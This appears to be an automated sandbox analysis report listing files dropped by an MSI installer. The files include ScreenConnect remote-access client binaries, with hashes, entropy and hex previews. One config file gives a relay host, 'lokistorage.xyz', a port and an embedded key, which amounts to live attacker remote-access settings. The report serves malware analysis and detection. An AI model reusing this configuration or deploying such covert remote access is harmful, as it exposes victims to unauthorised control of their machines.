                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):49959
                                                                Entropy (8bit):4.758252520953682
                                                                Encrypted:false
                                                                SSDEEP:1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
                                                                MD5:511202ED0BA32D7F09EAB394C917D067
                                                                SHA1:DBD611720FD1730198F72DEC09E8E23E6D6488F8
                                                                SHA-256:F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
                                                                SHA-512:F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):26722
                                                                Entropy (8bit):7.7401940386372345
                                                                Encrypted:false
                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):197120
                                                                Entropy (8bit):6.595800276062395
                                                                Encrypted:false
                                                                SSDEEP:3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
                                                                MD5:F311A8217807F6C85817058522E234A2
                                                                SHA1:CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
                                                                SHA-256:032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
                                                                SHA-512:5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: Latest version 4.7.exe, Detection: malicious, Browse
                                                                • Filename: INSPECAO-B01S.msi, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 1.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: 5iT2ITz44g.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: E-receipt-67.exe, Detection: malicious, Browse
                                                                • Filename: statment.exe, Detection: malicious, Browse
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0.............*.... ... ....... .......................`.......L....@.....................................O.... ..|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=...*..0...........~)...%-.&~(.....|...s&...%.)...(...+..~*...%-.&~(.....}...s(...%.*...(...+.r9..
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):68096
                                                                Entropy (8bit):6.081952570081618
                                                                Encrypted:false
                                                                SSDEEP:1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
                                                                MD5:3FF07C657068430EF677181D1F67066D
                                                                SHA1:37F7E9D2CCB65B4EA2733393015635EA1B43393E
                                                                SHA-256:D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
                                                                SHA-512:5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....j...s....%.,...(...+*vs....%.}Q.........s....(....*....0...........s....}.....s....}...........}.......('.....}.....(....&.(*..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):95520
                                                                Entropy (8bit):6.505417048098125
                                                                Encrypted:false
                                                                SSDEEP:1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
                                                                MD5:826314610D9E854477B08666330940B5
                                                                SHA1:65B601D60042CF6F263CD38AC2F63CD06A9DE159
                                                                SHA-256:E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
                                                                SHA-512:5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):546304
                                                                Entropy (8bit):6.03286879586464
                                                                Encrypted:false
                                                                SSDEEP:6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
                                                                MD5:3B1BA4BEBEFDC8A95B0F2F0B4E50C527
                                                                SHA1:15551D2E8BFB829F3A96D161B43DE820C0D417CE
                                                                SHA-256:A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
                                                                SHA-512:F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):1721344
                                                                Entropy (8bit):6.638160977312247
                                                                Encrypted:false
                                                                SSDEEP:24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
                                                                MD5:D196174CF03F86C8776E717F07D5D19F
                                                                SHA1:BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
                                                                SHA-256:A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
                                                                SHA-512:CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):260168
                                                                Entropy (8bit):6.416438906122177
                                                                Encrypted:false
                                                                SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):61216
                                                                Entropy (8bit):6.316664164724877
                                                                Encrypted:false
                                                                SSDEEP:1536:9Ai+zmNzdj8bv8DtYQ4RE+TC34/ibdt7Xx56:9UzmNDYQbEQta
                                                                MD5:C1F206B0C0058DC4CC7B9F3125F61E20
                                                                SHA1:541A1564799DA24C48BE188888F306381EF23728
                                                                SHA-256:94E711FD79FC81084FB222FF927893669DDBA9890C6622DD4981FB5766438A63
                                                                SHA-512:6163A255DAF2DC9EC14391F31CA09A466B7B33662F2215B9941ADD59B46CD1177E9240D2B1C42E41EA0AC9AE2EFA03F6A2D3E80497D32F6E505B813ED66DA2AD
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c.8..........."...0.............*.... ........@.. ....................... ............@.....................................O....... ............... )..............8............................................ ............... ..H............text...0.... ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S...............................................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s ...(!...s....("...*..0...........(#.....($.....(%....s....%.o&...%.o'...%.o(...%s!...o)...%~....o*...}......(....o+...o,....(-.....@...%..(.....o.....s/...}.....{...........s0...o1....s...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):598816
                                                                Entropy (8bit):6.182826342545805
                                                                Encrypted:false
                                                                SSDEEP:6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
                                                                MD5:AB5FA8D90645878D587F386D0E276C02
                                                                SHA1:A602A20735A1104851F293965F1FE4AB678BF627
                                                                SHA-256:316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
                                                                SHA-512:A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:true
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):842248
                                                                Entropy (8bit):6.268561504485627
                                                                Encrypted:false
                                                                SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):81696
                                                                Entropy (8bit):5.861320173003981
                                                                Encrypted:false
                                                                SSDEEP:1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
                                                                MD5:2C158A30F7274E1931860E434DE808A2
                                                                SHA1:F649A56C9A598117D68CC6999627A937305DB6C7
                                                                SHA-256:B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
                                                                SHA-512:14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):266
                                                                Entropy (8bit):4.842791478883622
                                                                Encrypted:false
                                                                SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):2268
                                                                Entropy (8bit):4.7228220006400745
                                                                Encrypted:false
                                                                SSDEEP:48:35iMs86h/dHH/dHS/dHmh/dHfh/dH8h/dHjdH6dH85AfdH55AfdHKdH/dHAdHYOk:0OeHVHeHyHzHAHZHUH82H52HkH1HyHDC
                                                                MD5:095C85ACC658F0733BC6941163EC234C
                                                                SHA1:298C53608E02CAC620702CB6ABE75C70560C03B1
                                                                SHA-256:8E3DC9D06B282A536E1AF7806D7F434D5738D4932DAE557CCD762BFEED0BFC11
                                                                SHA-512:FE3FBE2BCD2BAABCF192663DD7603CCE1DB1025A9D40AD98598D5441D892EFC0C94AA41FE61256762538E0ED3BCC3E7958CDBF87C2D577EE3BDD561597635D03
                                                                Malicious:false
                                                                Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />.. <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.SystemSettings />.. <ScreenConnect.UserInterfaceSettings>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConne
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:XML 1.0 document, ASCII text, with very long lines (447), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):937
                                                                Entropy (8bit):5.785690574308825
                                                                Encrypted:false
                                                                SSDEEP:24:2dL9hK6E4dl/SKGumeV858KnTqKoIgmCeKMG3vH:chh7HHSomeV8LnuKoHmCeKT3v
                                                                MD5:5E233AF4F36C85FA9CA6A643F8CEA130
                                                                SHA1:9F64A3CFB01BBFE02C4511F0AF9856FA2DA89452
                                                                SHA-256:317F6ACC9CF9A2DAD21874D0F439C6B6DE3C14BA875FAA525B24CA5DBC74C91D
                                                                SHA-512:4CD32CD0243BEA0CA3C45544D65F4DBA0DBEDB79E09C4A8211AF0568E2F6C7EFE77B5D2C7EA21C7EB94FF1863D426EBA850055819F294DF1C1D0C4D311C036D7
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=lokistorage.xyz&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                Process:C:\Windows\SysWOW64\rundll32.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):746
                                                                Entropy (8bit):5.349174276064173
                                                                Encrypted:false
                                                                SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                Malicious:false
